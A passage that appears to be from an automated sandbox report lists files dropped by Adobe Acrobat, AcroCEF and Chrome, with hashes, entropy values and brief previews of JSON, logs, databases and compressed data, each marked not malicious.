                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):286
                                                                                              Entropy (8bit):5.293772754765403
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfshHHrPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGUUUkee9
                                                                                              MD5:0F073ACC45A3D959C5F201FD0DE2AAEB
                                                                                              SHA1:5AF70EDA871C28888F577CD91736D8CC7355FD81
                                                                                              SHA-256:686A02B8AFB3238EAA9F737020DE800136B75EC0F2FFB482A5D0ADBAD251DDBF
                                                                                              SHA-512:7FD1C35F634604DA4033DCB92870488809781C3918F9C1E31E2346A7F8F0BBB8D305CB875CD5898B1A087002B9B44F77C31C2C9645D6A6CCC15CB054C809CC5F
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):282
                                                                                              Entropy (8bit):5.3047784350630325
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJTqgFCrPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGTq16Ukee9
                                                                                              MD5:D5EC0892F3BC7129623BA8BDED579425
                                                                                              SHA1:50AC24CE72B20F099406AAD3F21D318BFAFA4996
                                                                                              SHA-256:8A10E138AD9096E373DBD07075570D7856D4AF3D3A7019922485C2C77DD4463D
                                                                                              SHA-512:733DBA0BAD2950A33AEDD03B0183D6D63D4FF6AF082F4088A9FBDBC958702E0E7DE8934DC5DC9491E28BD4FAFF438CDC2AF3C5E57639914EF2722ECB325F0CEE
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4
                                                                                              Entropy (8bit):0.8112781244591328
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:e:e
                                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                              Malicious:false
                                                                                              Preview:....
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):2814
                                                                                              Entropy (8bit):5.1365180793816405
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:YzWFuHcawfday6sWljy7pQi14EjbUGfj0SMwAc2d2LS+C3x3OBZhM1n5T9huEvOG:YzQJfSbljy1J1BggV04wx3OrhMRh9Tb
                                                                                              MD5:80D4DCBFE31317DF9344B8390E8EFEB9
                                                                                              SHA1:2EE5C71BFE742EEB793BF382FF46925C02FA59CF
                                                                                              SHA-256:F330191657A794E6DEFBBAFB787716B9CDBE8CB6947AB2991B6CE4CBBE713D55
                                                                                              SHA-512:DC6CA5EA3568281C4F44A008488810C2C29FDB260AF09F6EBFEA5D365976D9577D4612DDC7C0620BF77B9D46FFAF91B71C666A7612237AAD1C568A83958ADA5A
                                                                                              Malicious:false
                                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2a57db99c0f1762d3919842affd1ba04","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736966485000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d3c084309781f90677d65eecc2ecce5a","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736966485000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"6fed4358569b1b48c20eb81f43840c0b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736966485000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"a07c6d0244ee85d6eafbeaca63ca2c5b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736966485000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"0c98a381e254c11b07b1139f67f5f503","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736966485000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"76a63ceb4b9759c6839a8886a54e1a80","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                              Category:dropped
                                                                                              Size (bytes):12288
                                                                                              Entropy (8bit):0.9880287726824489
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeAJEIcLESiAie4JEF:TVl2GL7ms67YXtrAJbcI8EJI
                                                                                              MD5:535AA37FF9F951339C1ECF85C8A5451E
                                                                                              SHA1:69EE041920D1CB095E88FE693C35E5E14062B657
                                                                                              SHA-256:44587B1FB86555B956193FD0F098E1D2AF28D30C36CA45C0F96152FD9436E33A
                                                                                              SHA-512:4613020684E23542E4CD1CE116531DA05E8927A56DD733893C0D702D8C1BF9325C207EE1321F85BA59100ED02F5684C0EFBE3F295964837A5C1CD29F04E6FB26
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:SQLite Rollback Journal
                                                                                              Category:dropped
                                                                                              Size (bytes):8720
                                                                                              Entropy (8bit):1.3434278633511663
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:7+t7ASY9QmQ6QeAJE7cLESiAi0mY9QjnqLBx/XYKQvGJF7ursq3:7M7lYXtrAJocI8KYynqll2GL7msq3
                                                                                              MD5:91A161792137892566FE02330EB7E77F
                                                                                              SHA1:1B06103C198D43F031DBD4197A7062221D0C4EAD
                                                                                              SHA-256:FB82F31C3EF264DE680282B36C34D23A4F7785B9BB5145AAE4C5598E2A74B862
                                                                                              SHA-512:49E8F3E68551B2F761A23E7C597D351A7356B814A49C048AD343A986A6232C0D60033A2BE4A26076E9EB9C8B161EB1EAB1A65C749B9E3865DBD8EDBF831FBC49
                                                                                              Malicious:false
                                                                                              Preview:.... .c......t+.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):66726
                                                                                              Entropy (8bit):5.392739213842091
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgyJJuShx1pycaEisosd01zmUTRYyu:6a6TZ44ADEIueBycaEdzMRK
                                                                                              MD5:F029423972C8874C1E6E16E7E81231AE
                                                                                              SHA1:096ED84C7D373DE5F616FF510BBFD035008C58FA
                                                                                              SHA-256:69D5CC4418460A89C37745E52612BCC7FE1137D75B076801B571E29021269C7B
                                                                                              SHA-512:2B7C840F250F865B9563BBE3A223DDB59522F6835DEF8DCEB3BB3234BA07A05A481DD26BDFBEF0341C8EBF840E28B8098BB7543F065C33B3B041727DD5066169
                                                                                              Malicious:false
                                                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):246
                                                                                              Entropy (8bit):3.51161293806784
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+pClEc9:Qw946cPbiOxDlbYnuRKZDa
                                                                                              MD5:875EE55FE9D4A994842CD192A2BB99CF
                                                                                              SHA1:31E8266377B1E5C44836770E26A9F6388A80E471
                                                                                              SHA-256:CCBB05EDD4A8EB0825E76354862E2FF087D9C02E7070F9D1E605D9DD21AF1A57
                                                                                              SHA-512:6EE7FBECB16FB3C386BFB24B7602752AEB4E3628C4CE599D33F6307906121CC9FD8D2C8E5E254751897D9E612BD3D76F380E60CCE62FC0151B09F992F4920FD5
                                                                                              Malicious:false
                                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.0.1./.2.0.2.5. . .1.3.:.4.1.:.2.7. .=.=.=.....
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:ASCII text, with very long lines (393)
                                                                                              Category:dropped
                                                                                              Size (bytes):16525
                                                                                              Entropy (8bit):5.353642815103214
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                              MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                              SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                              SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                              SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                              Malicious:false
                                                                                              Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):15114
                                                                                              Entropy (8bit):5.369508996854611
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:b7GRdXVLuNcadgOz9xpMLuUrmKlZP2GJC44FC8FJjbLUJN2Z2cdiVlgfSnVVXvfz:a6tYz
                                                                                              MD5:E8B04F340EED8206FEFC4AE1E53469C1
                                                                                              SHA1:64B9BD818F9947A6E52BC5E8ADA0A668471E1092
                                                                                              SHA-256:9BB8F7F2B01567B0FA4132E0B6FB06C226028B6FCA2E6D6D227535FFCCD022BA
                                                                                              SHA-512:AF6E0A151A8EC0ABBD19A3D1317056BA5A67A5D84A5FFBD23D033BCC409BB5B600E0A8EE7F628965DA9DFEBFD728C901FE6F268C4E0F055379A15F421E30FEDD
                                                                                              Malicious:false
                                                                                              Preview:SessionID=fc430c8b-9733-4c61-81b0-0b3f6ebbb3bc.1736966481547 Timestamp=2025-01-15T13:41:21:547-0500 ThreadID=6172 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=fc430c8b-9733-4c61-81b0-0b3f6ebbb3bc.1736966481547 Timestamp=2025-01-15T13:41:21:555-0500 ThreadID=6172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=fc430c8b-9733-4c61-81b0-0b3f6ebbb3bc.1736966481547 Timestamp=2025-01-15T13:41:21:556-0500 ThreadID=6172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=fc430c8b-9733-4c61-81b0-0b3f6ebbb3bc.1736966481547 Timestamp=2025-01-15T13:41:21:556-0500 ThreadID=6172 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=fc430c8b-9733-4c61-81b0-0b3f6ebbb3bc.1736966481547 Timestamp=2025-01-15T13:41:21:560-0500 ThreadID=6172 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):29752
                                                                                              Entropy (8bit):5.415439230521334
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbccbYI9fcbt:fhWlA/TVG9Y
                                                                                              MD5:7E621EEBC1FF51B177DF9DCA7AF1AD3D
                                                                                              SHA1:C64E9C7E39007F0328BA236461E5B2F6DE32C8F4
                                                                                              SHA-256:FAFB5167D912FAF076516027AEFFED4EA63350DD7169CBCFE293C445256AE98F
                                                                                              SHA-512:C528F753E58A82633EC9DE7F42E9A6E1B542751D4F67941F1651FA183B846DE73EE1E113B05B1F12B8F8AA8A8C888D3C204983B8E49B32C67D22C94D8CE6AAAD
                                                                                              Malicious:false
                                                                                              Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                              Category:dropped
                                                                                              Size (bytes):386528
                                                                                              Entropy (8bit):7.9736851559892425
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                              Malicious:false
                                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                              Category:dropped
                                                                                              Size (bytes):1419751
                                                                                              Entropy (8bit):7.976496077007677
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:/xXwYIGNPgOWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JXwZGDWLxYGZN3mlind9i4ufFXpAXkru
                                                                                              MD5:8DE7F8054D360BA016642F9E6BE20B6A
                                                                                              SHA1:E001251216DE9FFDEFA085FC232D4AA5AF1A05AE
                                                                                              SHA-256:869ED550A77944FF3966CA56F7BB9CFDA979AF710D3B068B0853697AE120EA50
                                                                                              SHA-512:59A2F077CDA34172A3005E72CF97786AE8C6C7BDB04053956FE8CF5F178B28DED5AAFC8825DC0DA09EBA89E1CB909A42634A2073D396E716639AB91642048972
                                                                                              Malicious:false
                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                              Category:dropped
                                                                                              Size (bytes):758601
                                                                                              Entropy (8bit):7.98639316555857
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:bWNh3P6+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:C3PDegf121YS8lkipdjMMNB1DofjgJJg
                                                                                              MD5:59EE5E2FB56A099CAA8EDFD7AF821ED6
                                                                                              SHA1:F5DC4F876768D57B69EC894ADE0A66E813BFED92
                                                                                              SHA-256:E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75
                                                                                              SHA-512:77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE
                                                                                              Malicious:false
                                                                                              Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 25552
                                                                                              Category:dropped
                                                                                              Size (bytes):1407294
                                                                                              Entropy (8bit):7.97605879016224
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:/ndpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tj7oxVWeGZ4ZwYIGNPq:P3mlind9i4ufFXpAXkrfUs0uxVWeGZ4c
                                                                                              MD5:EA9090F69E93F643FB78CC754D27250D
                                                                                              SHA1:6CFB486782AEC0A54721B2DC3B0203EF765DD325
                                                                                              SHA-256:793B56097F4665545BAA3C93D87F1D9FDFA2D723B00FFBE816111ACB4673053B
                                                                                              SHA-512:DD79B9318D0960AC68446B946C77BBDE9D47A9A61F074708ABA876CE278C21B5EC19DC6F7BB04105FA79ED87DF7B2ADB23CB2B36EF0581B33B376AF7218EABB4
                                                                                              Malicious:false
                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2673
                                                                                              Entropy (8bit):3.9915370400277355
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8WdhTJZFHaidAKZdA1FehwiZUklqehAy+3:88rW/y
                                                                                              MD5:ABDDE76FD7D541FB9A2E3FF395543C8B
                                                                                              SHA1:F09EAE8C420E3A1C6AF684C507BA8950EB9D038E
                                                                                              SHA-256:62022C273EA204ABC3C1FF6BB0F49A9D61B509A0EB47633A03EB3C730E3885E2
                                                                                              SHA-512:30B109A6AEE1D9477A73DA51CDE0A00524326E30640816C6E389326CB9D1E96786DF5B2CC93001820F7B53A6049161EC9763AB02AF614791710F764980095FA5
                                                                                              Malicious:false
